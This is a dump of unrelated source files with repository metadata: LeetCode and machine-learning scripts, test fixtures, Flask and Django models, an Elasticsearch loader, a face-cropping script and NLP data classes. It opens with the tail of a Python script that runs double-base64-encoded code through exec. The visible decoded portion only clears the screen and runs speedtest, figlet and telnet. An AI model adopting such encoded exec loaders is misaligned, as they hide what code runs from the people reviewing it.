bVZ5S1FwbGJHbG1JRVZzYVhSbElEMDlJRE02Q2lBZ0lDQnZjeTV6ZVhOMFpXMG9JbU5zWldGeUlp
a0tJQ0FnSUc5ekxuTjVjM1JsYlNnaVptbG5iR1YwSUZCbGNuTnBZVzVGYkdsMFpTQWlLUXBsYkds
bUlFVnNhWFJsSUQwOUlESTZDaUFnSUNCdmN5NXplWE4wWlcwb0ltTnNaV0Z5SWlrS0lDQWdJRzl6
TG5ONWMzUmxiU2dpY0dsd0lHbHVjM1JoYkd3Z2MzQmxaV1IwWlhOMExXTnNhU0lwQ2lBZ0lDQnZj
eTV6ZVhOMFpXMG9Jbk53WldWa2RHVnpkQzFqYkdraUtRcGxiR2xtSUVWc2FYUmxJRDA5SURRNkNp
QWdJQ0J2Y3k1emVYTjBaVzBvSW5SbGJHNWxkQ0IwYjNkbGJDNWliR2x1YTJWdWJHbG5hSFJ6TG01
c0lpa0siKQpleGVjKGJhc2U2NC5iNjRkZWNvZGUoeCkpCg=='''))
|
[
"noreply@github.com"
] |
TERMUX20210.noreply@github.com
|
bbc257704347d7f441fdbee899a6469c903d2547
|
09df89395816834ddf77de620f959c22e74d8c00
|
/two pointer/4sum.py
|
b718a7fe2a55d01a2998c1b012d6f980712976b4
|
[] |
no_license
|
gdh756462786/Leetcode_by_python
|
c853c4e3de255a8b4016c59944a0d40213a539a7
|
6387543a2a23c30aef1d5d37db54ca72cfb19270
|
refs/heads/master
| 2020-06-22T11:53:24.758506
| 2018-12-28T03:03:31
| 2018-12-28T03:03:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,728
|
py
|
#coding: utf-8
'''
Given an array S of n integers, are there elements a, b, c,
and d in S such that a + b + c + d = target?
Find all unique quadruplets in the array
which gives the sum of target.
Note: The solution set must not contain duplicate quadruplets.
For example, given array S = [1, 0, -1, 0, -2, 2], and target = 0.
A solution set is:
[
[-1, 0, 0, 1],
[-2, -1, 1, 2],
[-2, 0, 0, 2]
]
'''
class Solution(object):
def fourSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[List[int]]
"""
nums.sort()
res = []
length = len(nums)
for i in xrange(0, length - 3):
if i and nums[i] == nums[i-1]:
continue
for j in xrange(i+1, length - 2):
if j != i + 1 and nums[j] == nums[j - 1]:
continue
sum = target - nums[i] - nums[j]
left, right = j + 1, length - 1
while left < right:
if nums[left] + nums[right] == sum:
res.append([nums[i], nums[j],
nums[left], nums[right]])
right -= 1
left += 1
while left < right and nums[left] == nums[left-1]:
left += 1
while left < right and nums[right] == nums[right+1]:
right -= 1
elif nums[left] + nums[right] > sum:
right -= 1
else:
left += 1
return res
solution = Solution()
print solution.fourSum([1,0,-1,0,-2,2], 0)
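# Expected output of the call above (as produced by this two-pointer solution):
# [[-2, -1, 1, 2], [-2, 0, 0, 2], [-1, 0, 0, 1]]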
|
[
"pengshuang92@163.com"
] |
pengshuang92@163.com
|
75084d5f50d30f264bd62819aa2a3de04acf7d31
|
852f1b6cc06ac01845b37d78e842d19b74922056
|
/Regression/polynomial_linear_regression.py
|
e47dd22df892708890143a41f3d115bf56c6ed95
|
[] |
no_license
|
Ankur800/AI-Udemy
|
be8abbfb5ee1273dca1b98720f2ffdd7d55794b6
|
06ef7a6dc4909b45b913f934100319d3da0f0ff1
|
refs/heads/master
| 2022-12-19T08:28:11.900582
| 2020-09-27T11:27:37
| 2020-09-27T11:27:37
| 298,285,263
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,034
|
py
|
# IMPORTING THE LIBRARIES
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# IMPORTING DATASET
dataset = pd.read_csv("/home/ankur/Udemy ML/Machine Learning A-Z (Codes and Datasets)/Part 2 - Regression/Section 6 - Polynomial Regression/Python/Position_Salaries.csv")
X = dataset.iloc[:, 1:-1].values
y = dataset.iloc[:, -1].values
# -----NOTE-----
# We want the model to use all available data for the prediction, so we do not
# split the dataset into training and test sets (no SPLITTING step).
# TRAINING THE LINEAR REGRESSION MODEL ON WHOLE DATASET
from sklearn.linear_model import LinearRegression
lin_reg = LinearRegression()
lin_reg.fit(X, y)
# TRAINING THE POLYNOMIAL REGRESSION ON THE WHOLE DATASET
from sklearn.preprocessing import PolynomialFeatures
poly_reg = PolynomialFeatures(degree=4) # degree means 'n' in b0 + b1*x1 + b2*(x1)^2 + ... + bn*(x1)^n
X_poly = poly_reg.fit_transform(X)
lin_reg_2 = LinearRegression()
lin_reg_2.fit(X_poly, y)
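# Quick illustrative check (not from the original script): with one input
# feature x, PolynomialFeatures(degree=4) expands each row into the columns
# [1, x, x^2, x^3, x^4], which is the design matrix lin_reg_2 is fitted on.
print(poly_reg.fit_transform([[2]]))  # -> [[ 1.  2.  4.  8. 16.]]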
# VISUALISING LINEAR REGRESSION RESULTS
plt.scatter(X, y, color='red')
plt.plot(X, lin_reg.predict(X), color='blue')
plt.title('Truth or Bluff (Linear Regression)')
plt.xlabel('Position Level')
plt.ylabel('Salary')
plt.show()
# VISUALISING POLYNOMIAL REGRESSION RESULTS
plt.scatter(X, y, color='red')
plt.plot(X, lin_reg_2.predict(poly_reg.fit_transform(X)), color='blue')
plt.title('Truth or Bluff (Polynomial Regression)')
plt.xlabel('Position Level')
plt.ylabel('Salary')
plt.show()
# VISUALISING POLYNOMIAL REGRESSION RESULTS (for higher resolution and smoother curve)
X_grid = np.arange(min(X), max(X), 0.1)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X, y, color='red')
plt.plot(X_grid, lin_reg_2.predict(poly_reg.fit_transform(X_grid)), color='blue')
plt.title('Truth or Bluff (Polynomial Regression)')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show()
# PREDICTING A NEW RESULT WITH LINEAR REGRESSION
print(lin_reg.predict([[6.5]]))
# PREDICTING A NEW RESULT WITH POLYNOMIAL REGRESSION
print(lin_reg_2.predict(poly_reg.fit_transform([[6.5]])))
|
[
"ankurrai800@gmail.com"
] |
ankurrai800@gmail.com
|
61aff27c1371eae56c95e28fd996301b43fce1db
|
e6404513b30d5f274ca0d18af26e40d73f38cc28
|
/2带有一个隐藏层的平面数据分类/testCases.py
|
779e0b66f682754658341e39a90f8e6c8c77814b
|
[] |
no_license
|
MrVBian/deplearning.ai
|
b5c2c0b9def932e12ae2909ccca561edcd7cf34d
|
e935793a866837ab752c99aeb486bcaf4ce7311f
|
refs/heads/master
| 2020-12-23T02:24:07.667931
| 2020-02-01T08:24:30
| 2020-02-01T08:24:30
| 237,004,481
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,034
|
py
|
#-*- coding: UTF-8 -*-
"""
# WANGZHE12
"""
import numpy as np
def layer_sizes_test_case():
np.random.seed(1)
X_assess = np.random.randn(5, 3)
Y_assess = np.random.randn(2, 3)
return X_assess, Y_assess
def initialize_parameters_test_case():
n_x, n_h, n_y = 2, 4, 1
return n_x, n_h, n_y
def forward_propagation_test_case():
np.random.seed(1)
X_assess = np.random.randn(2, 3)
parameters = {'W1': np.array([[-0.00416758, -0.00056267],
[-0.02136196, 0.01640271],
[-0.01793436, -0.00841747],
[ 0.00502881, -0.01245288]]),
'W2': np.array([[-0.01057952, -0.00909008, 0.00551454, 0.02292208]]),
'b1': np.array([[ 0.],
[ 0.],
[ 0.],
[ 0.]]),
'b2': np.array([[ 0.]])}
return X_assess, parameters
def compute_cost_test_case():
np.random.seed(1)
Y_assess = np.random.randn(1, 3)
parameters = {'W1': np.array([[-0.00416758, -0.00056267],
[-0.02136196, 0.01640271],
[-0.01793436, -0.00841747],
[ 0.00502881, -0.01245288]]),
'W2': np.array([[-0.01057952, -0.00909008, 0.00551454, 0.02292208]]),
'b1': np.array([[ 0.],
[ 0.],
[ 0.],
[ 0.]]),
'b2': np.array([[ 0.]])}
a2 = (np.array([[ 0.5002307 , 0.49985831, 0.50023963]]))
return a2, Y_assess, parameters
def backward_propagation_test_case():
np.random.seed(1)
X_assess = np.random.randn(2, 3)
Y_assess = np.random.randn(1, 3)
parameters = {'W1': np.array([[-0.00416758, -0.00056267],
[-0.02136196, 0.01640271],
[-0.01793436, -0.00841747],
[ 0.00502881, -0.01245288]]),
'W2': np.array([[-0.01057952, -0.00909008, 0.00551454, 0.02292208]]),
'b1': np.array([[ 0.],
[ 0.],
[ 0.],
[ 0.]]),
'b2': np.array([[ 0.]])}
cache = {'A1': np.array([[-0.00616578, 0.0020626 , 0.00349619],
[-0.05225116, 0.02725659, -0.02646251],
[-0.02009721, 0.0036869 , 0.02883756],
[ 0.02152675, -0.01385234, 0.02599885]]),
'A2': np.array([[ 0.5002307 , 0.49985831, 0.50023963]]),
'Z1': np.array([[-0.00616586, 0.0020626 , 0.0034962 ],
[-0.05229879, 0.02726335, -0.02646869],
[-0.02009991, 0.00368692, 0.02884556],
[ 0.02153007, -0.01385322, 0.02600471]]),
'Z2': np.array([[ 0.00092281, -0.00056678, 0.00095853]])}
return parameters, cache, X_assess, Y_assess
def update_parameters_test_case():
parameters = {'W1': np.array([[-0.00615039, 0.0169021 ],
[-0.02311792, 0.03137121],
[-0.0169217 , -0.01752545],
[ 0.00935436, -0.05018221]]),
'W2': np.array([[-0.0104319 , -0.04019007, 0.01607211, 0.04440255]]),
'b1': np.array([[ -8.97523455e-07],
[ 8.15562092e-06],
[ 6.04810633e-07],
[ -2.54560700e-06]]),
'b2': np.array([[ 9.14954378e-05]])}
grads = {'dW1': np.array([[ 0.00023322, -0.00205423],
[ 0.00082222, -0.00700776],
[-0.00031831, 0.0028636 ],
[-0.00092857, 0.00809933]]),
'dW2': np.array([[ -1.75740039e-05, 3.70231337e-03, -1.25683095e-03,
-2.55715317e-03]]),
'db1': np.array([[ 1.05570087e-07],
[ -3.81814487e-06],
[ -1.90155145e-07],
[ 5.46467802e-07]]),
'db2': np.array([[ -1.08923140e-05]])}
return parameters, grads
def nn_model_test_case():
np.random.seed(1)
X_assess = np.random.randn(2, 3)
Y_assess = np.random.randn(1, 3)
return X_assess, Y_assess
def predict_test_case():
np.random.seed(1)
X_assess = np.random.randn(2, 3)
parameters = {'W1': np.array([[-0.00615039, 0.0169021 ],
[-0.02311792, 0.03137121],
[-0.0169217 , -0.01752545],
[ 0.00935436, -0.05018221]]),
'W2': np.array([[-0.0104319 , -0.04019007, 0.01607211, 0.04440255]]),
'b1': np.array([[ -8.97523455e-07],
[ 8.15562092e-06],
[ 6.04810633e-07],
[ -2.54560700e-06]]),
'b2': np.array([[ 9.14954378e-05]])}
return parameters, X_assess
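# Illustrative usage (not part of the original file): each *_test_case function
# returns fixed-seed fixtures for the exercises, e.g.
#     X_assess, Y_assess = layer_sizes_test_case()        # shapes (5, 3), (2, 3)
#     n_x, n_h, n_y = initialize_parameters_test_case()   # (2, 4, 1)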
|
[
"544207374@qq.com"
] |
544207374@qq.com
|
d9e42f7c20892e299d99cc31c41b880619b60a1f
|
393d628ed83e40fbc45bde1fa77415446fa70e5d
|
/app/models.py
|
839a69e01df5020e0d29d54476dd8f51746a88a5
|
[] |
no_license
|
danoscarmike/cloud-run-clients
|
9c980d52efb621f4bd07f44b1cd75234e649d317
|
28efeb8ebc43474c5d9266b74198279a78a3893a
|
refs/heads/master
| 2020-07-06T18:02:44.503327
| 2020-03-15T04:36:28
| 2020-03-15T04:36:28
| 203,097,560
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,585
|
py
|
from app import db, login
from app.enums import ProtoSourceEnum
from datetime import datetime
from flask_login import UserMixin
from hashlib import md5
from werkzeug.security import check_password_hash, generate_password_hash
followers = db.Table(
'followers',
db.Column('follower_id', db.Integer, db.ForeignKey('user.id')),
db.Column('followed_service_id', db.Integer, db.ForeignKey('service.id'))
)
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
first_name = db.Column(db.String(128))
last_name = db.Column(db.String(128))
email = db.Column(db.String(128), index=True, unique=True)
password_hash = db.Column(db.String(128))
events = db.relationship('Event', backref='user', lazy='dynamic')
about_me = db.Column(db.String(140))
last_seen = db.Column(db.DateTime, default=datetime.utcnow)
services_followed = db.relationship(
'Service',
secondary=followers,
primaryjoin=(followers.c.follower_id == id),
backref=db.backref('followers', lazy='dynamic'),
lazy='dynamic'
)
def __repr__(self):
return f'<User {self.username} {self.id}>'
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def avatar(self, size):
digest = md5(self.email.lower().encode('utf-8')).hexdigest()
return f'https://www.gravatar.com/avatar/{digest}?d=robohash&s={size}'
def is_following(self, service):
return self.services_followed.filter(
followers.c.followed_service_id == service.id).count() > 0
    def follow(self, service):
        if not self.is_following(service):
            # append via the same relationship that is_following() queries
            self.services_followed.append(service)
    def unfollow(self, service):
        if self.is_following(service):
            self.services_followed.remove(service)
def followed_events(self):
return Event.query.join(
followers, (followers.c.followed_service_id ==
Event.service_id)).filter(
followers.c.follower_id == self.id).order_by(
Event.created.desc())
class Service(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128), index=True)
title = db.Column(db.String(128))
version = db.Column(db.String(64))
proto_url = db.Column(db.String(128))
proto_source = db.Column(db.Enum(ProtoSourceEnum))
is_google_api = db.Column(db.Boolean)
updated = db.Column(db.DateTime, index=True)
events = db.relationship('Event', backref='service', lazy='dynamic')
user_followers = db.relationship(
'User',
secondary=followers,
primaryjoin=(followers.c.followed_service_id == id),
backref=db.backref('followed', lazy='dynamic'),
lazy='dynamic'
)
def __repr__(self):
return f'<Service {self.name}:{self.version}>'
class Event(db.Model):
id = db.Column(db.Integer, primary_key=True)
created = db.Column(db.DateTime, index=True)
service_id = db.Column(db.Integer, db.ForeignKey('service.id'))
success = db.Column(db.Boolean)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return f'<Event {self.id}>'
    def format_datetime(self, created):
        # note: %t is not a valid strftime directive; use an explicit time format
        return self.created.strftime("%A, %b %d, %Y %H:%M %Z")
@login.user_loader
def load_user(id):
return User.query.get(int(id))
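# Minimal usage sketch (illustrative; assumes an app context and a configured
# database -- the names below are hypothetical):
#     user = User(username='alice', email='alice@example.com')
#     user.set_password('s3cret')
#     service = Service(name='translate', version='v3')
#     db.session.add_all([user, service])
#     user.follow(service)
#     db.session.commit()
#     assert user.is_following(service)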
|
[
"omeara.dan@gmail.com"
] |
omeara.dan@gmail.com
|
9f5e9d876177a2fc9c4febb4d2751b4545cf9e71
|
9a009af13c21ad04a818959a6bad5f149febbae3
|
/movie/migrations/0007_movie_slug.py
|
35882f7c30fe73b9c794e6bd138076707c8fa4c4
|
[] |
no_license
|
Surdy-A/SMBD
|
412089d8ce7369d679d0a3d10f853a6070498060
|
c3c6a9d7b5626bc931d77dbe617ed145be3dcf7e
|
refs/heads/master
| 2022-12-24T23:02:18.004371
| 2019-10-02T15:52:55
| 2019-10-02T15:52:55
| 212,331,313
| 0
| 0
| null | 2022-12-08T06:39:54
| 2019-10-02T12:11:17
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 388
|
py
|
# Generated by Django 2.0.12 on 2019-09-20 13:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('movie', '0006_auto_20190919_2336'),
]
operations = [
migrations.AddField(
model_name='movie',
name='slug',
field=models.SlugField(blank=True, null=True),
),
]
|
[
"sodiq.ajayi@yahoo.com"
] |
sodiq.ajayi@yahoo.com
|
4a99813b5b510d1c3e54f984e37578b9b344e3bd
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/helpers/pydev/third_party/isort_container/isort/natural.py
|
aac8c4a36157fb3029c683d472cf5ff67163f7f9
|
[
"EPL-1.0",
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
"""isort/natural.py.
Enables sorting strings that contain numbers naturally
usage:
natural.nsorted(list)
Copyright (C) 2013 Timothy Edmund Crosley
Implementation originally from @HappyLeapSecond stack overflow user in response to:
http://stackoverflow.com/questions/5967500/how-to-correctly-sort-a-string-with-a-number-inside
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
import re
def _atoi(text):
return int(text) if text.isdigit() else text
def _natural_keys(text):
return [_atoi(c) for c in re.split(r'(\d+)', text)]
def nsorted(to_sort, key=None):
"""Returns a naturally sorted list"""
if key is None:
key_callback = _natural_keys
else:
def key_callback(item):
return _natural_keys(key(item))
return sorted(to_sort, key=key_callback)
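# Small illustrative example (not part of the original module): natural sorting
# orders numeric runs numerically rather than lexicographically.
if __name__ == '__main__':
    items = ['file10.txt', 'file2.txt', 'file1.txt']
    assert nsorted(items) == ['file1.txt', 'file2.txt', 'file10.txt']
    assert sorted(items) == ['file1.txt', 'file10.txt', 'file2.txt']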
|
[
"Elizaveta.Shashkova@jetbrains.com"
] |
Elizaveta.Shashkova@jetbrains.com
|
760ff8aa460a84a683f8d82b749f8a0b113441e6
|
f5c3c9e0f48ae65e730521465d3eaccba3790403
|
/gene-names-pipeline/map-gene-names.py
|
7d74dba1ded9f81044afc24874660b76cca704e6
|
[] |
no_license
|
chair300/atsnp_pipeline
|
fc6c7dc24a421e2e50aa364cbdb4a259451637bc
|
6cc5a0256c4c9254f98da7f4b9ca0d660cf0a46d
|
refs/heads/master
| 2023-03-15T21:51:01.855949
| 2017-12-27T22:55:11
| 2017-12-27T22:55:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,170
|
py
|
import re
import pickle
import json
from elasticsearch import Elasticsearch, helpers
DRY_RUN = False
#Run without indexing into Elasticsearch, in case something looks fishy.
#For test mode: INDEX_NAME = 'gencode_genes_test_1'
INDEX_NAME = 'gencode_genes'
#for old cluster: ELASTIC_URLS = [ 'atsnp-db1', 'atsnp-db2', 'atsnp-db3']
#No need to round-robin this anymore.
ELASTIC_URLS = [ 'db05']
# This runs in place in a very short time.
# Don't hesitate to just delete the whole index and rebuild.
def get_one_bulk_action_json(json_record):
#index was atsnp_data
bulkj = {
'_index': INDEX_NAME,
'_type' : 'gencode_gene_symbols',
'_source': json_record
}
return bulkj
def put_bulk_json_into_elasticsearch(es, action):
#print "length of action : " + str(len(action))
son = json.dumps(action)
#index="gencode_genes",
result = \
helpers.bulk(es, action, index=INDEX_NAME,
doc_type="gencode_gene_symbols")
return result
gene_map_file = 'correct-gencode-genes'
with open(gene_map_file) as f:
lines = f.readlines()
es = Elasticsearch(ELASTIC_URLS)
action = []
es_chunk_size = 150
i = 0
#skip the header line.
for line in lines[1:]:
split_line = line.split()
chromosome = split_line[2]
start_pos = split_line[4]
end_pos = split_line[5]
gene_symbol = split_line[12]
#print "line ; " debug purposes only:
#for oneitem, k in enumerate(split_line):
# print str(k), oneitem
j_dict = { "chr" : chromosome,
"start_pos" : start_pos,
"end_pos" : end_pos,
"gene_symbol" : gene_symbol
}
#print "jdict : " + repr(j_dict)
assert(start_pos.isdigit())
assert(end_pos.isdigit())
#assert(chromosome.replace('chr', '').isdigit())
action.append(j_dict)
i = i + 1
if i % es_chunk_size == 0:
print "reached " + str(i) + " rows."
if not DRY_RUN:
result = put_bulk_json_into_elasticsearch(es, action)
action = []
print "placing the last " + str(len(action)) + " gene names into the database."
put_bulk_json_into_elasticsearch(es, action)
|
[
"rebeccakathrynhudson@gmail.com"
] |
rebeccakathrynhudson@gmail.com
|
25a8a889ea54141721a089bb297bfc32aba9006e
|
645c02b8414bee331d008f0724f30b088455bc1b
|
/celebA_parser.py
|
d22e8fe601a463332ed0baaea96323d4e3e547b7
|
[] |
no_license
|
tdrvlad/dataset-parsers
|
e3cdb66d2b69edf73d6be25289b1d22826df7404
|
f15bbd5914160a12637d0fd95478595028600b75
|
refs/heads/main
| 2023-03-30T17:31:28.440023
| 2021-04-06T15:43:32
| 2021-04-06T15:43:32
| 355,243,490
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,997
|
py
|
import os
import glob
import json
import shutil
from mtcnn.mtcnn import MTCNN
from PIL import Image
from numpy import asarray
identities_file = 'identity_CelebA.txt'
raw_dataset_dir = 'img_align_celeba_png'
processed_dataset_dir = 'CelebA_Faces'
MIN_IMG_PER_PERSON = 10
TRAIN_EVAL_SPLIT = 0.85
if os.path.exists(processed_dataset_dir):
shutil.rmtree(processed_dataset_dir)
os.mkdir(processed_dataset_dir)
os.mkdir(os.path.join(processed_dataset_dir, 'train'))
os.mkdir(os.path.join(processed_dataset_dir, 'test'))
def extract_face(filename, required_size=(240, 240)):
# load image from file
image = Image.open(filename)
# convert to RGB, if needed
image = image.convert('RGB')
# convert to array
pixels = asarray(image)
# create the detector, using default weights
detector = MTCNN()
# detect faces in the image
results = detector.detect_faces(pixels)
# extract the bounding box from the first face
try:
x1, y1, width, height = results[0]['box']
# bug fix
x1, y1 = abs(x1), abs(y1)
x2, y2 = x1 + width, y1 + height
# extract the face
face = pixels[y1:y2, x1:x2]
# resize pixels to the model size
image = Image.fromarray(face)
image = image.resize(required_size)
return image
    except Exception:
        # no face was detected, or the crop could not be processed
        return None
identities_lines = open(identities_file, 'r').readlines()
persons = {}
for line in identities_lines:
split_line = line.split()
img_file = split_line[0].split('.')[0] + '.png'
person_id = split_line[1].rstrip('\n')
if persons.get(person_id) is None:
persons[person_id] = []
persons[person_id].append(img_file)
print('Found {} unique persons.'.format(len(persons.keys())))
for person_id, image_files in persons.items():
if len(image_files) > MIN_IMG_PER_PERSON:
train_person_dir = os.path.join(processed_dataset_dir, 'train', 'person_{}'.format(person_id))
test_person_dir = os.path.join(processed_dataset_dir, 'test', 'person_{}'.format(person_id))
if not os.path.exists(train_person_dir):
os.mkdir(train_person_dir)
if not os.path.exists(test_person_dir):
os.mkdir(test_person_dir)
split = int(TRAIN_EVAL_SPLIT * len(image_files))
j=0
for f in image_files[:split]:
image_face = extract_face(os.path.join(raw_dataset_dir,f))
            if image_face is not None:
image_face.save(os.path.join(train_person_dir, 'img_{}.png'.format(j)))
j += 1
j=0
for f in image_files[split:]:
image_face = extract_face(os.path.join(raw_dataset_dir,f))
            if image_face is not None:
image_face.save(os.path.join(test_person_dir, 'img_{}.png'.format(j)))
j += 1
else:
print('Not enough images')
|
[
"noreply@github.com"
] |
tdrvlad.noreply@github.com
|
8e755e05fe9f1570a29aab3b8c2a2dd8a369f742
|
506f74a5172d6fdfeed257374f164fa6852819be
|
/nlp_pytorch/language_model_p2/data.py
|
f5a437c9263994d1b685c699c457fd911fe2cad0
|
[
"MIT"
] |
permissive
|
RegiusQuant/nlp-practice
|
b1047911dd2fe976b650530230b64dac251c4dce
|
ffa99aa585134941aa148da11775c2b16d42eef7
|
refs/heads/master
| 2021-01-06T09:09:08.304223
| 2020-04-18T06:21:01
| 2020-04-18T06:21:01
| 241,273,050
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,489
|
py
|
# -*- coding: utf-8 -*-
# @Time    : 2020/3/18 11:52 AM
# @Author : RegiusQuant <315135833@qq.com>
# @Project : nlp-practice
# @File : data.py
# @Desc    : Data storage structures for the language model
from collections import Counter
from pathlib import Path
from typing import List, Tuple
import numpy as np
import torch
import torch.nn as nn
class Vocab:
"""单词表类, 用于存储单词相关的数据结构
Args:
vocab_path (Path): 单词表文件路径
Attributes:
stoi (Dict): 存储每个单词对应索引的字典
itos (List): 单词列表
"""
def __init__(self, vocab_path: Path):
self.stoi = {} # token -> index (dict)
self.itos = [] # index -> token (list)
with open(vocab_path) as f:
            # in bobsue.voc.txt, each line is a single word
for w in f.readlines():
w = w.strip()
if w not in self.stoi:
self.stoi[w] = len(self.itos)
self.itos.append(w)
def __len__(self):
return len(self.itos)
class SentCorpus:
"""基于单句训练的语料库
Args:
data_path (Path): 数据集路径
uniform (bool): 是否采用均匀分布采样
freq_coef (float): 使用词频采样时的提升系数
Attributes:
vocab (Vocab): 单词表类的实例
train_data (List): 保存训练句子单词索引的列表
valid_data (List): 保存验证句子单词索引的列表
test_data (List): 保存测试句子单词索引的列表
word_counter (Counter): 保存有训练句子中出现单词的计数器
word_freqs (List): 训练数据中的单词采样词频
"""
def __init__(self, data_path: Path, uniform: bool = False, freq_coef: float = 0.1):
self.vocab = Vocab(data_path / 'bobsue.voc.txt')
self.train_data = self.tokenize(data_path / 'bobsue.lm.train.txt')
self.valid_data = self.tokenize(data_path / 'bobsue.lm.dev.txt')
self.test_data = self.tokenize(data_path / 'bobsue.lm.test.txt')
        # count the words that occur in the training set
        self.word_counter = Counter()
        for x in self.train_data:
            # note: <s> is never a prediction target, so do not count it
            self.word_counter += Counter(x[1:])
        if uniform:  # uniform distribution
            self.word_freqs = np.array([0.] + [1. for _ in range(len(self.vocab) - 1)], dtype=np.float32)
            self.word_freqs = self.word_freqs / sum(self.word_freqs)
        else:  # frequency distribution (raised to the freq_coef power)
self.word_freqs = np.array([self.word_counter[i] for i in range(len(self.vocab))], dtype=np.float32)
self.word_freqs = self.word_freqs / sum(self.word_freqs)
self.word_freqs = self.word_freqs**freq_coef
self.word_freqs = self.word_freqs / sum(self.word_freqs)
def tokenize(self, text_path: Path) -> List[List[int]]:
"""将文本中所有句子转换为单词序号列表
Args:
text_path (Path): 文本路径
Returns:
index_data (List): 处理为序号的列表
"""
with open(text_path) as f:
index_data = [] # 索引数据,存储每个样本的单词索引列表
for s in f.readlines():
index_data.append(self.sentence_to_index(s))
return index_data
def sentence_to_index(self, s: str) -> List[int]:
"""将由字符串表示的一句话转换为单词序号列表
Args:
s (str): 句子字符串
Returns:
result (List): 句子转换后的序号列表
"""
return [self.vocab.stoi[w] for w in s.split()]
def index_to_sentence(self, x: List[int]) -> str:
"""将单词序号列表转换成对应的字符串
Args:
x (List): 由单词序号构成的列表
Returns:
result (str): 序号列表转换后的字符串
"""
return ' '.join([self.vocab.itos[i] for i in x])
class NegSampleDataSet(torch.utils.data.Dataset):
"""负例采样的PyTorch数据集
Args:
index_data (List): 语料库中的编号数据
word_freqs (List): 负例采样的词频列表
n_negs (int): 负例采样数目
"""
def __init__(self, index_data: List[List[int]], word_freqs: List[float], n_negs: int = 20):
self.index_data = index_data # 转换为序号的文本
self.n_negs = n_negs # 生成负例个数
self.word_freqs = torch.FloatTensor(word_freqs) # 词频
def __getitem__(self, i):
inputs = torch.LongTensor(self.index_data[i][:-1])
poss = torch.LongTensor(self.index_data[i][1:])
        # draw n_negs negative samples for every position
negs = torch.zeros((len(poss), self.n_negs), dtype=torch.long)
        for j in range(len(poss)):  # j avoids shadowing the sample index i
            negs[j] = torch.multinomial(self.word_freqs, self.n_negs)
return inputs, poss, negs
def __len__(self):
return len(self.index_data)
def neglm_collate_fn(batch):
    # first, transpose the batch format:
    # batch[0]: Inputs
    # batch[1]: Poss
    # batch[2]: Negs
batch = list(zip(*batch))
# lengths: (batch_size)
lengths = torch.LongTensor([len(x) for x in batch[0]])
# inputs: (batch_size, max_len)
inputs = nn.utils.rnn.pad_sequence(batch[0], batch_first=True)
# poss: (batch_size, max_len)
poss = nn.utils.rnn.pad_sequence(batch[1], batch_first=True)
# negs: (batch_size, max_len, n_negs)
negs = nn.utils.rnn.pad_sequence(batch[2], batch_first=True)
# mask: (batch_size, max_len)
mask = (poss != 0).float()
return inputs, poss, negs, lengths, mask
class ContextCorpus:
"""基于上下文的语料库
Args:
data_path (Path): 数据集路径
Attributes:
vocab (Vocab): 单词表类的实例
train_data (List): 保存训练上下文句子单词索引的列表
valid_data (List): 保存验证上下文句子单词索引的列表
test_data (List): 保存测试上下文句子单词索引的列表
"""
def __init__(self, data_path: Path):
self.vocab = Vocab(data_path / 'bobsue.voc.txt')
self.train_data = self.tokenize(data_path / 'bobsue.prevsent.train.tsv')
self.valid_data = self.tokenize(data_path / 'bobsue.prevsent.dev.tsv')
self.test_data = self.tokenize(data_path / 'bobsue.prevsent.test.tsv')
def tokenize(self, text_path: Path) -> List[Tuple[List[int], List[int]]]:
"""将文本中上下文句子转换为单词序号列表
Args:
text_path (Path): 文本路径
Returns:
index_data (List): 经过处理后的列表
"""
with open(text_path) as f:
index_data = []
for s in f.readlines():
t = s.split('\t')
index_data.append((self.sentence_to_index(t[0]), self.sentence_to_index(t[1])))
return index_data
def sentence_to_index(self, s):
return [self.vocab.stoi[w] for w in s.split()]
def index_to_sentence(self, x):
return ' '.join([self.vocab.itos[i] for i in x])
class ContextDataset(torch.utils.data.Dataset):
"""基于上下文的PyTorch数据集
Args:
index_data (List): 语料库中的编号数据
"""
